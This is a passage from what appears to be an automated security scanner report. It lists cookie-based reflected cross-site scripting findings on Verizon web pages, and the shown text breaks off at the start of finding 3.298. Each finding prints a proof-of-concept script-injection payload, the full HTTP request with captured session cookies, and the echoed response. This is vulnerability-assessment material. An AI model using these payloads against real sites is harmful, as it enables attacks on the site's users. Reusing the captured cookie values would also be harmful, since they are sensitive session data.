Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:53:26 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:53:26 GMT; path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<input type='hidden' id='locationInfo' value='TXD0DAC'><SCRIPT>ALERT(1)</SCRIPT>82A3C612B6A ' />
...[SNIP]...

3.294. https://www22.verizon.com/Residential/aboutFiOS/labs/labs.htm [VzApps cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www22.verizon.com
Path:   /Residential/aboutFiOS/labs/labs.htm

Issue detail

The value of the VzApps cookie is copied into the HTML document as plain text between tags. The payload 3db93<script>alert(1)</script>e45ae62280 was submitted in the VzApps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/aboutFiOS/labs/labs.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: amlbcookie=05; SMSESSION=LOGGEDOFF; RecentlyVisitedOffers=fios_fiftv_dp,FiOS Double Play,69.99*/^; AprURL=https%3A%2F%2Fessentialsandextras.verizon.com%3A443%2Fapp-cust-selfservices%2Fmyvz%2Fbuy.do%3Foid%3DVX210; canigetfios=Y; dotcomsid=; vzinhomeagent=GUID=YgBkADAAMABmADAAMwA0AC0ANwAyAGUAOQAtADQANgBkADcALQA4ADcAMgAxAC0AOABjADcAOAA3ADEAOAA5ADgAMQAxAGUA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMwA5ADQAMwA2ADAAMAA8AC8AVAByAGEAbgBzAGEAYwB0AGkAbwBuAEkAZAA+AA==&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA=&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA8AC8AVABlAHgAdAA+ADwALwBVAHMAZQByAFQAZQB4AHQAPgA=&AccountIDAuthMode=bgBvAA==; ASPSESSIONIDSABSSSST=HHHPAFBDPIGAFLDEMCPHAODD; op629myverizongum=a01502v07o26bkl00b6l5126bkl00k6ns7d46; autosuggest=on; BPSPANISH=N; PDSS=PflowId=a7a49eba9a20412b8ff824542165515c; ContextInfo_Internet=HighSpeed; UserSystemInfo=browser=QQBwAHAAbABlAE0AQQBDAC0AUwBhAGYAYQByAGkAQQBTAFAALgBzAGUAcgB2AGkAYwBlAF8AYQBzAHAAeAAgADUALgAwAA==&os=IABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEA&IP=MQA3ADQALgAxADIAMgAuADIAMwAuADIAMQA4ACwAIAAyADAANAAuADIALgAyADEANQAuADEANAA3ACwAIAAxADEAMgAuADYANAAuADEALgAxADAANwA=; ak-sf=false; CMS_TimeZoneOffset=360; ActualProtectedResource=https://essentialsandextras.verizon.com:443/app-cust-selfservices/myvz/buy.do?oid=VX210; Product=A; VzApps=STATE=TX3db93<script>alert(1)</script>e45ae62280; ProductXML=A; IHAClientIP=112.64.2.103; LOB_CATEGORY=; ASPSESSIONIDAACQSSTQ=HFFMAEHCEIGODAGPDJIINHAB; Source=CHSI; CustTrackPage=GHP; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6f845525d5f4f58455e445a4a423660; DSS=flowId=ee5115194db84b9b9834c670b1ec6451; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASPSESSIONIDSQAQATBB=KMLLKLLAMEBBDHEPMGMLIECK; NSC_xxx22_tqmbu_mcw=ffffffffa54c16ce45525d5f4f58455e445a4a423660; 
RecentlyVisited=Verizon%2520%257C%2520Local%2520%2526%2520Long%2520Distance%2520Phone@http%253A//www22.verizon.com/residentialhelp/phone%23Verizon%2520%257C%2520High%2520Speed%2520Internet%2520-%2520What%2520is%2520Verizon%2520Your%2520Domain%253F@http%253A//www22.verizon.com/ResidentialHelp/HighSpeed/Email/Setup+And+Use/QuestionsOne/121547.htm%23; CenterSelected=0; showpromo=Y; vzpers=STATE=TX; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc6de45525d5f4f58455e445a4a423660; refURL=http://www22.verizon.com/terms/; ASPSESSIONIDCSBCCATB=AMIFEODCEAGLGPHFECKFJCGD; lob=consumer; WT_FPC=id=25c0e3eb152dc13a7901290217656258:lv=1290218421002:ss=1290217656258; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69145525d5f4f58455e445a4a42366a; BusinessUnit=business; ECSPCookies=Partner=VZO&SolutionCenter=Phone&OOFState=&SupportCenter=&Internet=HighSpeed&TV=&Wireless=; ASPSESSIONIDQSBQBTBA=KLLAJDLAFLAJOEADIMAPCNBB; V347=CT-2; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; ASP.NET_SessionId=xssjr145hgrtk055l4w5jujb; VZGEO=west; RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; vzapps=STATE=TX; ReferralSitenet=http://webmail.verizon.net/signin/login.jsp?src=sam&err=1011; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; ASPSESSIONIDQSTCSSQS=LAJBKCHCFNBNOOFMIPDPEDIH; vzAppID=; op629myverizonliid=a01502v07o26bkl00b6l5126bkl00k6ns7d46; myservices=vzdock=N; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 78161
Expires: Sat, 20 Nov 2010 02:53:32 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 02:53:32 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:53:32 GMT; path=/
Set-Cookie: ContextInfo_State=TX3db93<script>alert(1)</script>e45ae62280; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:53:32 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:53:32 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:53:32 GMT; path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<DIV style="FLOAT: left" id=yourlocation>TX3DB93<SCRIPT>ALERT(1)</SCRIPT>E45AE62280 </DIV>
...[SNIP]...

3.295. https://www22.verizon.com/Residential/aboutFiOS/labs/labs.htm [dotcomsid cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www22.verizon.com
Path:   /Residential/aboutFiOS/labs/labs.htm

Issue detail

The value of the dotcomsid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1f41c"-alert(1)-"037c2ee7a79 was submitted in the dotcomsid cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Residential/aboutFiOS/labs/labs.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: amlbcookie=05; SMSESSION=LOGGEDOFF; RecentlyVisitedOffers=fios_fiftv_dp,FiOS Double Play,69.99*/^; AprURL=https%3A%2F%2Fessentialsandextras.verizon.com%3A443%2Fapp-cust-selfservices%2Fmyvz%2Fbuy.do%3Foid%3DVX210; canigetfios=Y; dotcomsid=1f41c"-alert(1)-"037c2ee7a79; vzinhomeagent=GUID=YgBkADAAMABmADAAMwA0AC0ANwAyAGUAOQAtADQANgBkADcALQA4ADcAMgAxAC0AOABjADcAOAA3ADEAOAA5ADgAMQAxAGUA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMwA5ADQAMwA2ADAAMAA8AC8AVAByAGEAbgBzAGEAYwB0AGkAbwBuAEkAZAA+AA==&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA=&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA8AC8AVABlAHgAdAA+ADwALwBVAHMAZQByAFQAZQB4AHQAPgA=&AccountIDAuthMode=bgBvAA==; ASPSESSIONIDSABSSSST=HHHPAFBDPIGAFLDEMCPHAODD; op629myverizongum=a01502v07o26bkl00b6l5126bkl00k6ns7d46; autosuggest=on; BPSPANISH=N; PDSS=PflowId=a7a49eba9a20412b8ff824542165515c; ContextInfo_Internet=HighSpeed; UserSystemInfo=browser=QQBwAHAAbABlAE0AQQBDAC0AUwBhAGYAYQByAGkAQQBTAFAALgBzAGUAcgB2AGkAYwBlAF8AYQBzAHAAeAAgADUALgAwAA==&os=IABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEA&IP=MQA3ADQALgAxADIAMgAuADIAMwAuADIAMQA4ACwAIAAyADAANAAuADIALgAyADEANQAuADEANAA3ACwAIAAxADEAMgAuADYANAAuADEALgAxADAANwA=; ak-sf=false; CMS_TimeZoneOffset=360; ActualProtectedResource=https://essentialsandextras.verizon.com:443/app-cust-selfservices/myvz/buy.do?oid=VX210; Product=A; VzApps=STATE=TX; ProductXML=A; IHAClientIP=112.64.2.103; LOB_CATEGORY=; ASPSESSIONIDAACQSSTQ=HFFMAEHCEIGODAGPDJIINHAB; Source=CHSI; CustTrackPage=GHP; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6f845525d5f4f58455e445a4a423660; DSS=flowId=ee5115194db84b9b9834c670b1ec6451; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASPSESSIONIDSQAQATBB=KMLLKLLAMEBBDHEPMGMLIECK; NSC_xxx22_tqmbu_mcw=ffffffffa54c16ce45525d5f4f58455e445a4a423660; 
RecentlyVisited=Verizon%2520%257C%2520Local%2520%2526%2520Long%2520Distance%2520Phone@http%253A//www22.verizon.com/residentialhelp/phone%23Verizon%2520%257C%2520High%2520Speed%2520Internet%2520-%2520What%2520is%2520Verizon%2520Your%2520Domain%253F@http%253A//www22.verizon.com/ResidentialHelp/HighSpeed/Email/Setup+And+Use/QuestionsOne/121547.htm%23; CenterSelected=0; showpromo=Y; vzpers=STATE=TX; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc6de45525d5f4f58455e445a4a423660; refURL=http://www22.verizon.com/terms/; ASPSESSIONIDCSBCCATB=AMIFEODCEAGLGPHFECKFJCGD; lob=consumer; WT_FPC=id=25c0e3eb152dc13a7901290217656258:lv=1290218421002:ss=1290217656258; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69145525d5f4f58455e445a4a42366a; BusinessUnit=business; ECSPCookies=Partner=VZO&SolutionCenter=Phone&OOFState=&SupportCenter=&Internet=HighSpeed&TV=&Wireless=; ASPSESSIONIDQSBQBTBA=KLLAJDLAFLAJOEADIMAPCNBB; V347=CT-2; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; ASP.NET_SessionId=xssjr145hgrtk055l4w5jujb; VZGEO=west; RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; vzapps=STATE=TX; ReferralSitenet=http://webmail.verizon.net/signin/login.jsp?src=sam&err=1011; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; ASPSESSIONIDQSTCSSQS=LAJBKCHCFNBNOOFMIPDPEDIH; vzAppID=; op629myverizonliid=a01502v07o26bkl00b6l5126bkl00k6ns7d46; myservices=vzdock=N; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 83946
Expires: Sat, 20 Nov 2010 02:53:21 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 02:53:21 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:53:21 GMT; path=/
Set-Cookie: ContextInfo_State=TX; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:53:21 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:53:21 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:53:21 GMT; path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<script type="text/javascript">
function startmenu()
{
}
var mvzOptIn="N";
var strdotcomval = "1f41c"-alert(1)-"037c2ee7a79"
if(mvzOptIn != 'Y' || strdotcomval == "")
{
    var m_view = new VZT.MasterNavView();
    var m_model = {container: document.getElementB
...[SNIP]...

3.296. https://www22.verizon.com/Residential/aboutFiOS/reviews/reviews.htm [VzApps cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www22.verizon.com
Path:   /Residential/aboutFiOS/reviews/reviews.htm

Issue detail

The value of the VzApps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 90afa'><script>alert(1)</script>32063bb4fe6 was submitted in the VzApps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/aboutFiOS/reviews/reviews.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: amlbcookie=05; SMSESSION=LOGGEDOFF; RecentlyVisitedOffers=fios_fiftv_dp,FiOS Double Play,69.99*/^; AprURL=https%3A%2F%2Fessentialsandextras.verizon.com%3A443%2Fapp-cust-selfservices%2Fmyvz%2Fbuy.do%3Foid%3DVX210; canigetfios=Y; dotcomsid=; vzinhomeagent=GUID=YgBkADAAMABmADAAMwA0AC0ANwAyAGUAOQAtADQANgBkADcALQA4ADcAMgAxAC0AOABjADcAOAA3ADEAOAA5ADgAMQAxAGUA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMwA5ADQAMwA2ADAAMAA8AC8AVAByAGEAbgBzAGEAYwB0AGkAbwBuAEkAZAA+AA==&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA=&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA8AC8AVABlAHgAdAA+ADwALwBVAHMAZQByAFQAZQB4AHQAPgA=&AccountIDAuthMode=bgBvAA==; ASPSESSIONIDSABSSSST=HHHPAFBDPIGAFLDEMCPHAODD; op629myverizongum=a01502v07o26bkl00b6l5126bkl00k6ns7d46; autosuggest=on; BPSPANISH=N; PDSS=PflowId=a7a49eba9a20412b8ff824542165515c; ContextInfo_Internet=HighSpeed; UserSystemInfo=browser=QQBwAHAAbABlAE0AQQBDAC0AUwBhAGYAYQByAGkAQQBTAFAALgBzAGUAcgB2AGkAYwBlAF8AYQBzAHAAeAAgADUALgAwAA==&os=IABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEA&IP=MQA3ADQALgAxADIAMgAuADIAMwAuADIAMQA4ACwAIAAyADAANAAuADIALgAyADEANQAuADEANAA3ACwAIAAxADEAMgAuADYANAAuADEALgAxADAANwA=; ak-sf=false; CMS_TimeZoneOffset=360; ActualProtectedResource=https://essentialsandextras.verizon.com:443/app-cust-selfservices/myvz/buy.do?oid=VX210; Product=A; VzApps=STATE=TX90afa'><script>alert(1)</script>32063bb4fe6; ProductXML=A; IHAClientIP=112.64.2.103; LOB_CATEGORY=; ASPSESSIONIDAACQSSTQ=HFFMAEHCEIGODAGPDJIINHAB; Source=CHSI; CustTrackPage=GHP; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6f845525d5f4f58455e445a4a423660; DSS=flowId=ee5115194db84b9b9834c670b1ec6451; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASPSESSIONIDSQAQATBB=KMLLKLLAMEBBDHEPMGMLIECK; NSC_xxx22_tqmbu_mcw=ffffffffa54c16ce45525d5f4f58455e445a4a423660; 
RecentlyVisited=Verizon%2520%257C%2520Local%2520%2526%2520Long%2520Distance%2520Phone@http%253A//www22.verizon.com/residentialhelp/phone%23Verizon%2520%257C%2520High%2520Speed%2520Internet%2520-%2520What%2520is%2520Verizon%2520Your%2520Domain%253F@http%253A//www22.verizon.com/ResidentialHelp/HighSpeed/Email/Setup+And+Use/QuestionsOne/121547.htm%23; CenterSelected=0; showpromo=Y; vzpers=STATE=TX; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc6de45525d5f4f58455e445a4a423660; refURL=http://www22.verizon.com/terms/; ASPSESSIONIDCSBCCATB=AMIFEODCEAGLGPHFECKFJCGD; lob=consumer; WT_FPC=id=25c0e3eb152dc13a7901290217656258:lv=1290218421002:ss=1290217656258; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69145525d5f4f58455e445a4a42366a; BusinessUnit=business; ECSPCookies=Partner=VZO&SolutionCenter=Phone&OOFState=&SupportCenter=&Internet=HighSpeed&TV=&Wireless=; ASPSESSIONIDQSBQBTBA=KLLAJDLAFLAJOEADIMAPCNBB; V347=CT-2; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; ASP.NET_SessionId=xssjr145hgrtk055l4w5jujb; VZGEO=west; RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; vzapps=STATE=TX; ReferralSitenet=http://webmail.verizon.net/signin/login.jsp?src=sam&err=1011; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; ASPSESSIONIDQSTCSSQS=LAJBKCHCFNBNOOFMIPDPEDIH; vzAppID=; op629myverizonliid=a01502v07o26bkl00b6l5126bkl00k6ns7d46; myservices=vzdock=N; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 71887
Expires: Sat, 20 Nov 2010 02:54:03 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 02:54:03 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:54:03 GMT; path=/
Set-Cookie: ContextInfo_State=TX90afa'><script>alert(1)</script>32063bb4fe6; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:54:03 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:54:03 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:54:03 GMT; path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<input type='hidden' id='locationInfo' value='TX90AFA'><SCRIPT>ALERT(1)</SCRIPT>32063BB4FE6 ' />
...[SNIP]...

3.297. https://www22.verizon.com/Residential/aboutFiOS/reviews/reviews.htm [VzApps cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www22.verizon.com
Path:   /Residential/aboutFiOS/reviews/reviews.htm

Issue detail

The value of the VzApps cookie is copied into the HTML document as plain text between tags. The payload dc3af<script>alert(1)</script>751ce609535 was submitted in the VzApps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/aboutFiOS/reviews/reviews.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: amlbcookie=05; SMSESSION=LOGGEDOFF; RecentlyVisitedOffers=fios_fiftv_dp,FiOS Double Play,69.99*/^; AprURL=https%3A%2F%2Fessentialsandextras.verizon.com%3A443%2Fapp-cust-selfservices%2Fmyvz%2Fbuy.do%3Foid%3DVX210; canigetfios=Y; dotcomsid=; vzinhomeagent=GUID=YgBkADAAMABmADAAMwA0AC0ANwAyAGUAOQAtADQANgBkADcALQA4ADcAMgAxAC0AOABjADcAOAA3ADEAOAA5ADgAMQAxAGUA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMwA5ADQAMwA2ADAAMAA8AC8AVAByAGEAbgBzAGEAYwB0AGkAbwBuAEkAZAA+AA==&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA=&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA8AC8AVABlAHgAdAA+ADwALwBVAHMAZQByAFQAZQB4AHQAPgA=&AccountIDAuthMode=bgBvAA==; ASPSESSIONIDSABSSSST=HHHPAFBDPIGAFLDEMCPHAODD; op629myverizongum=a01502v07o26bkl00b6l5126bkl00k6ns7d46; autosuggest=on; BPSPANISH=N; PDSS=PflowId=a7a49eba9a20412b8ff824542165515c; ContextInfo_Internet=HighSpeed; UserSystemInfo=browser=QQBwAHAAbABlAE0AQQBDAC0AUwBhAGYAYQByAGkAQQBTAFAALgBzAGUAcgB2AGkAYwBlAF8AYQBzAHAAeAAgADUALgAwAA==&os=IABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEA&IP=MQA3ADQALgAxADIAMgAuADIAMwAuADIAMQA4ACwAIAAyADAANAAuADIALgAyADEANQAuADEANAA3ACwAIAAxADEAMgAuADYANAAuADEALgAxADAANwA=; ak-sf=false; CMS_TimeZoneOffset=360; ActualProtectedResource=https://essentialsandextras.verizon.com:443/app-cust-selfservices/myvz/buy.do?oid=VX210; Product=A; VzApps=STATE=TXdc3af<script>alert(1)</script>751ce609535; ProductXML=A; IHAClientIP=112.64.2.103; LOB_CATEGORY=; ASPSESSIONIDAACQSSTQ=HFFMAEHCEIGODAGPDJIINHAB; Source=CHSI; CustTrackPage=GHP; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6f845525d5f4f58455e445a4a423660; DSS=flowId=ee5115194db84b9b9834c670b1ec6451; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASPSESSIONIDSQAQATBB=KMLLKLLAMEBBDHEPMGMLIECK; NSC_xxx22_tqmbu_mcw=ffffffffa54c16ce45525d5f4f58455e445a4a423660; 
RecentlyVisited=Verizon%2520%257C%2520Local%2520%2526%2520Long%2520Distance%2520Phone@http%253A//www22.verizon.com/residentialhelp/phone%23Verizon%2520%257C%2520High%2520Speed%2520Internet%2520-%2520What%2520is%2520Verizon%2520Your%2520Domain%253F@http%253A//www22.verizon.com/ResidentialHelp/HighSpeed/Email/Setup+And+Use/QuestionsOne/121547.htm%23; CenterSelected=0; showpromo=Y; vzpers=STATE=TX; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc6de45525d5f4f58455e445a4a423660; refURL=http://www22.verizon.com/terms/; ASPSESSIONIDCSBCCATB=AMIFEODCEAGLGPHFECKFJCGD; lob=consumer; WT_FPC=id=25c0e3eb152dc13a7901290217656258:lv=1290218421002:ss=1290217656258; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69145525d5f4f58455e445a4a42366a; BusinessUnit=business; ECSPCookies=Partner=VZO&SolutionCenter=Phone&OOFState=&SupportCenter=&Internet=HighSpeed&TV=&Wireless=; ASPSESSIONIDQSBQBTBA=KLLAJDLAFLAJOEADIMAPCNBB; V347=CT-2; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; ASP.NET_SessionId=xssjr145hgrtk055l4w5jujb; VZGEO=west; RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; vzapps=STATE=TX; ReferralSitenet=http://webmail.verizon.net/signin/login.jsp?src=sam&err=1011; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; ASPSESSIONIDQSTCSSQS=LAJBKCHCFNBNOOFMIPDPEDIH; vzAppID=; op629myverizonliid=a01502v07o26bkl00b6l5126bkl00k6ns7d46; myservices=vzdock=N; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 73425
Expires: Sat, 20 Nov 2010 02:54:07 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 02:54:07 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:54:07 GMT; path=/
Set-Cookie: ContextInfo_State=TXdc3af<script>alert(1)</script>751ce609535; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:54:07 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:54:07 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:54:07 GMT; path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<DIV style="FLOAT: left" id=yourlocation>TXDC3AF<SCRIPT>ALERT(1)</SCRIPT>751CE609535 </DIV>
...[SNIP]...

3.298. https://www22.verizon.com/Residential/aboutFiOS/reviews/reviews.htm [dotcomsid cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www22.verizon.com
Path:   /Residential/aboutFiOS/reviews/reviews.htm

Issue detail

